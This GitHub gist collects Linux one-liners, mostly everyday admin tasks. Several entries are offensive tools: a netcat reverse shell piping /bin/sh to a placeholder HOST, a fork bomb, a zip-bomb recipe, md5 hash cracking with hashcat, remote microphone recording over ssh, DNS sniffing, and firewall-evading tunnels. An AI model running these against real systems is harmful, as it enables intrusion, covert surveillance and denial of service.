Skip to content

Instantly share code, notes, and snippets.

@brannondorsey
Last active July 8, 2022 05:07
Show Gist options
  • Save brannondorsey/455ba51cd7f129ab3d8c16b417b853a5 to your computer and use it in GitHub Desktop.
Save brannondorsey/455ba51cd7f129ab3d8c16b417b853a5 to your computer and use it in GitHub Desktop.
One Liners

Count the number of unique characters in a file

# https://unix.stackexchange.com/questions/5010/how-can-i-count-the-number-of-different-characters-in-a-file
# works for linux. There is a variation for MacOS in the link ^
sed 's/\(.\)/\1\n/g' text.txt | sort | uniq -c # sort -nr # uncomment this to sort the list by frequency

Replace a string in all instances of files in a directory

# replace all instances of "original" with "replacement" for every file in the src/ directory
find src/ -type f | xargs sed -i "s#original#replacement#g"

Set Time

sudo cp /usr/share/zoneinfo/America/New_York /etc/localtime

Print collaborators on a git repository

# Taken from the Rust Chrono library makefile https://github.com/chronotope/chrono/blob/master/Makefile
git log --format='%aN <%aE>' | sort -u

Print UPnP broadcasts & services

See what hosts on your LAN provide Universal Plug-and-Play (UPnP) and Simple Service Discovery Protocol (SSDP) services and where to find them. Taken from here.

# Listen for all UPnP broadcasts (including yourself).
# NOTE: 239.255.255.250 is a special multicast address that all IPv4 UPnP uses
sudo tcpdump -vv -A -s 0 'port 1900 and host 239.255.255.250 and udp'

Get system's current DNS server

Confirmed to work with Ubuntu 16.04, taken from here.

# replace eth0 with your network interface
nmcli device show eth0 | grep IP4.DNS

See all DNS traffic on a network interface

sudo tcpdump udp port 53

Generate a self-signed SSL certficate key pair

# from https://www.sslshopper.com/article-most-common-openssl-commands.html
openssl req -x509 -sha256 -nodes -days 365 -newkey rsa:2048 -keyout private.key -out certificate.crt

Perform full system virus scan with ClamAV

# requires ClamAV to be installed
# sudo apt install clamav
# will take a while... saves information about infected files to scan.log
sudo clamscan --infected --recursive --log scan.log /

Get IP address

# https://www.digitalocean.com/community/tutorials/how-to-install-nginx-on-ubuntu-14-04-lts
ip addr show eth0 | grep inet | awk '{ print $2; }' | sed 's/\/.*$//' | head -n 1

Recursively spawn child processes until your machine crashes

# this is the most cryptic sh!t I've ever seen. From RTFM.
:(){ :|: & };:

Netcat reverse shell

Ok, technically this one isn't a one liner, but it is so damn powerful I have to include it.

From machine that receives shell:

# listen on port 8484
nc -l -p 8484

From machine that provides remote shell:

# from Red Team Field Manual
# equivalent to "nc -e /bin/sh <HOST> <PORT>", but most versions of nc don't support "-e"
# replace HOST with ip address of the machine "nc" is listening on
rm /tmp/x ; mkfifo /tmp/x ; cat /tmp/x | /bin/sh -i 2>&1 | nc HOST 8484 > /tmp/x

Print all DNS request hostnames on a network

# listen on all interfaces (promiscuous mode by default, but likely will only show your machine's traffic)
# can buffer packets up to a minute before displaying results
sudo tcpdump -i any -s 0 -l -n port 53 | sed -e "s/CNAME//" | awk '{ if ($8 ~ /.*\..*/) { print $8 } }' | sed -e "s/[,.]\{1,2\}$//"

Outputs:

twitter.com
twitter.com
www.facebook.com
www.facebook.com
star-mini.c10r.facebook.com
star-mini.c10r.facebook.com
gmail.com
gmail.com
gmail.com
www.google.com
www.google.com
www.google.com

# print sender -> reciever as well
sudo tcpdump -i any -s 0 -l -n port 53 | sed -e "s/CNAME//" | awk '{ if ($8 ~ /.*\..*/) { print $3 " > " $5 " DNS: " $8 } }' | sed -e "s/[,.]\{1,2\}$//"

Count the number of email address occurances in each text file in a folder

# email regex from here https://www.shellhacks.com/regex-find-email-addresses-file-grep/
grep -c -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}" folder/*.txt | awk -F: '{ print $2": "$1 }' | sort -nr 

Record the mic on a remote linux machine

# Red Team Field Manual
ssh user@ip arecord - | aplay -

Get a random filename from a folder

echo "$(ls . | sort -R | head -n 1)"

Generate strong passwords with /dev/urandom

# https://www.unix-ninja.com/p/A_cheat-sheet_for_password_crackers
tr -dc 'a-zA-Z0-9._!@#$%^&*()' < /dev/urandom | fold -w 20 | head -n 1

Brute-force crack md5 hashes

hashcat -m 0 -a 3 hashes.txt --potfile-path hashcat.pot 

where hashes.txt is a file with one md5 hash per line and hashcat.pot is the output cracked hash file.

Create a Zip Bomb

# create a 10MB gzipped file that unzips to 10GB and crashes a web browser
# https://blog.haschek.at/2017/how-to-defend-your-website-with-zip-bombs.html
dd if=/dev/zero bs=1M count=10240 | gzip > 10G.gzip

View Failed SSH Logins

# https://extremeshok.com/6309/linux-see-all-failed-ssh-login-attempts/
sudo cat /var/log/auth.log | grep 'sshd.*Failed'

View Outbound TCP Connections

# https://serverfault.com/questions/670331/how-to-make-netstat-on-linux-only-show-outbound-tcp-connections
# shows all connections that AREN'T localhost
netstat -atn | tr -s ' ' | cut -f5 -d ' ' | grep -v '127.0.0.1'

Check Bound (Listening) Ports

# https://debian-administration.org/article/184/How_to_find_out_which_process_is_listening_upon_a_port
# it can takes a while... (the last grep filters out unix sockets)
netstat -a | grep LISTEN | grep -v unix

Once you get those results, you can check out which PIDs opened those ports with

sudo lsof -i :PORT

Port Forwarding With iptables

This is particularly useful for giving non-root users access to priviledged ports.

# forward external traffic on port 80 to 8080
sudo iptables -A PREROUTING -t nat -p tcp --dport 80 -j REDIRECT --to-ports 8080

# the same, but can be resolved on localhost
sudo iptables -I OUTPUT -t nat -p tcp -d 127.0.0.1 --dport 80 -j REDIRECT --to-ports 8080

Make Current iptables Rules Persist After Reboot

# if you've already got iptables-persistent installed, just run the second part
sudo apt install iptables-persistent && sudo iptables-save > /etc/iptables/rules.r4

Basic SSH Tunneling

# "inbound" tunnel from a remote servers's port to a port on your machine.
# can be used to evade local network firewalls
RPORT=8080 LPORT=80 ssh -R *:${RPORT}:localhost:${LPORT} USER@HOST
# "outbound" tunnel from your local machine to a port on a remote machine.
# can be to access a port on a server that isn't publicly available on net
LPORT=8080 RPORT=80 ssh -L localhost:${LPORT}:localhost:${RPORT} USER@HOST

SOCKS5 proxy Traffic through a remote server

You can proxy HTTP/S traffic from a web browser through a remote server in this way. Once you've run the below command open Firefox > Edit > Preferences > Network Settings > Configure Proxy Access to the Internet and then add "localhost" and "8080" as a SOCKS proxy.

LPORT=80 ssh -CfND ${LPORT} ${USER}@${HOST}

Create a Persistent ssh-tunnel with Autossh

# bind local port 22 to port 2222 on REMOTE_HOST
autossh -f -N -M 0 -o "ServerAliveInterval 30" -o "ServerAliveCountMax 3" -R 0.0.0.0:2222:localhost:22 REMOTE_USER@REMOTE_HOST

Kill a Process by Grep

pkill will only kill processes that match a binary name. This allows you to kill a process by grep, e.g. kill a python slowloris.py without killing all python processes.

# https://www.commandlinefu.com/commands/view/1138/ps-ef-grep-process-grep-v-grep-awk-print-2-xargs-kill-9
ps -ef | grep "python slowloris" | grep -v grep | awk '{print $2}' | xargs kill -9

Mirror a Static Website

# https://www.guyrutenberg.com/2014/05/02/make-offline-mirror-of-a-site-using-wget/
wget --mirror --execute="robots = off" --convert-links --adjust-extension --page-requisites --no-parent -N http://WEBSITE.com

Generating Random Data (python)

# generate a space-dilimited string of 300 random floats between -1.0 and 1.0
import random; ' '.join([str(random.uniform(-1, 1)) for x in range(300)])

Remove non-UTF-8 characters from a file

https://stackoverflow.com/questions/12999651/how-to-remove-non-utf-8-characters-from-text-file
iconv -f utf-8 -t utf-8 -c file.txt > newfile.txt
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment